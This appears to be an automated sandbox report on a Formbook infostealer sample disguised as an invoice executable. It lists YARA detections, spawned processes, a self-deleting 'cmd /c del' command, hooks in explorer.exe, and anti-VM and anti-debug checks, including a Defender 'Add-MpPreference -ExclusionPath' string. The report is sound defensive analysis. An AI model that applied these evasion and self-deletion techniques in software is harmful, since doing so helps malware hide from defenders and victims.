Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: INv02938727.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/1@3/3

Source: C:\Users\user\Desktop\INv02938727.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INv02938727.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_01

Source: INv02938727.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INv02938727.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: INv02938727.exe	Virustotal: Detection: 61%
Source: INv02938727.exe	Metadefender: Detection: 35%
Source: INv02938727.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\INv02938727.exe 'C:\Users\user\Desktop\INv02938727.exe'
Source: C:\Users\user\Desktop\INv02938727.exe	Process created: C:\Users\user\Desktop\INv02938727.exe C:\Users\user\Desktop\INv02938727.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Users\user\Desktop\INv02938727.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INv02938727.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INv02938727.exe	Process created: C:\Users\user\Desktop\INv02938727.exe C:\Users\user\Desktop\INv02938727.exe	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INv02938727.exe'	Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: INv02938727.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: INv02938727.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: INv02938727.exe, 00000002.00000002.318304038.000000000134F000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INv02938727.exe, control.exe
Source:	Binary string: control.pdbUGP source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041721D push es; ret	2_2_00417232
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_004175DF push ds; iretd	2_2_004175F2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_004175A0 push ds; iretd	2_2_004175F2
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041B68C pushad ; iretd	2_2_0041B68D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041CEB5 push eax; ret	2_2_0041CF08
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041CF6C push eax; ret	2_2_0041CF72
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041CF02 push eax; ret	2_2_0041CF08
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0041CF0B push eax; ret	2_2_0041CF72
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012AD0D1 push ecx; ret	2_2_012AD0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_04DED0D1 push ecx; ret	15_2_04DED0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2721D push es; ret	15_2_02E27232
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2CEB5 push eax; ret	15_2_02E2CF08
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2B68C pushad ; iretd	15_2_02E2B68D
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2CF6C push eax; ret	15_2_02E2CF72
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2CF02 push eax; ret	15_2_02E2CF08
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E2CF0B push eax; ret	15_2_02E2CF72
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E275DF push ds; iretd	15_2_02E275F2
Source: C:\Windows\SysWOW64\control.exe	Code function: 15_2_02E275A0 push ds; iretd	15_2_02E275F2

Source: initial sample

Static PE information: section name: .text entropy: 7.70994295605

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6

Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INv02938727.exe PID: 4852, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\INv02938727.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\INv02938727.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002E198E4 second address: 0000000002E198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002E19B5E second address: 0000000002E19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\INv02938727.exe

Code function: 2_2_00409A90 rdtsc

2_2_00409A90

Source: C:\Users\user\Desktop\INv02938727.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe TID: 4864	Thread sleep time: -101578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe TID: 5640	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6504	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7076	Thread sleep time: -55000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\INv02938727.exe	Thread delayed: delay time: 101578			Jump to behavior
Source: C:\Users\user\Desktop\INv02938727.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000003.00000000.276653332.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.276653332.0000000008A32000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.276912618.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.276912618.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000002.524190302.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000003.00000000.276768053.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000003.00000000.276912618.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.276768053.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.271171109.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000003.00000000.268165828.00000000059C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\INv02938727.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\INv02938727.exe

Code function: 2_2_00409A90 rdtsc

2_2_00409A90

Source: C:\Users\user\Desktop\INv02938727.exe

Code function: 2_2_0040ACD0 LdrLoadDll,

2_2_0040ACD0

Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]	2_2_01274120
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]	2_2_01274120
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]	2_2_01274120
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01274120 mov eax, dword ptr fs:[00000030h]	2_2_01274120
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01274120 mov ecx, dword ptr fs:[00000030h]	2_2_01274120
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128513A mov eax, dword ptr fs:[00000030h]	2_2_0128513A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128513A mov eax, dword ptr fs:[00000030h]	2_2_0128513A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259100 mov eax, dword ptr fs:[00000030h]	2_2_01259100
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259100 mov eax, dword ptr fs:[00000030h]	2_2_01259100
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01259100 mov eax, dword ptr fs:[00000030h]	2_2_01259100
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125C962 mov eax, dword ptr fs:[00000030h]	2_2_0125C962
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125B171 mov eax, dword ptr fs:[00000030h]	2_2_0125B171
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125B171 mov eax, dword ptr fs:[00000030h]	2_2_0125B171
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127B944 mov eax, dword ptr fs:[00000030h]	2_2_0127B944
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127B944 mov eax, dword ptr fs:[00000030h]	2_2_0127B944
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012861A0 mov eax, dword ptr fs:[00000030h]	2_2_012861A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012861A0 mov eax, dword ptr fs:[00000030h]	2_2_012861A0
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D69A6 mov eax, dword ptr fs:[00000030h]	2_2_012D69A6
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]	2_2_012D51BE
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]	2_2_012D51BE
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]	2_2_012D51BE
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D51BE mov eax, dword ptr fs:[00000030h]	2_2_012D51BE
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]	2_2_013149A4
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]	2_2_013149A4
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]	2_2_013149A4
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_013149A4 mov eax, dword ptr fs:[00000030h]	2_2_013149A4
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0127C182 mov eax, dword ptr fs:[00000030h]	2_2_0127C182
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128A185 mov eax, dword ptr fs:[00000030h]	2_2_0128A185
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01282990 mov eax, dword ptr fs:[00000030h]	2_2_01282990
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0125B1E1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0125B1E1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0125B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0125B1E1
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012E41E8 mov eax, dword ptr fs:[00000030h]	2_2_012E41E8
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]	2_2_0128002D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]	2_2_0128002D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]	2_2_0128002D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]	2_2_0128002D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0128002D mov eax, dword ptr fs:[00000030h]	2_2_0128002D
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]	2_2_0126B02A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]	2_2_0126B02A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]	2_2_0126B02A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_0126B02A mov eax, dword ptr fs:[00000030h]	2_2_0126B02A
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01324015 mov eax, dword ptr fs:[00000030h]	2_2_01324015
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01324015 mov eax, dword ptr fs:[00000030h]	2_2_01324015
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D7016 mov eax, dword ptr fs:[00000030h]	2_2_012D7016
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D7016 mov eax, dword ptr fs:[00000030h]	2_2_012D7016
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012D7016 mov eax, dword ptr fs:[00000030h]	2_2_012D7016
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01312073 mov eax, dword ptr fs:[00000030h]	2_2_01312073
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01321074 mov eax, dword ptr fs:[00000030h]	2_2_01321074
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01270050 mov eax, dword ptr fs:[00000030h]	2_2_01270050
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_01270050 mov eax, dword ptr fs:[00000030h]	2_2_01270050
Source: C:\Users\user\Desktop\INv02938727.exe	Code function: 2_2_012990AF mov eax, dword ptr fs:[00000030h]	2_2_012990AF
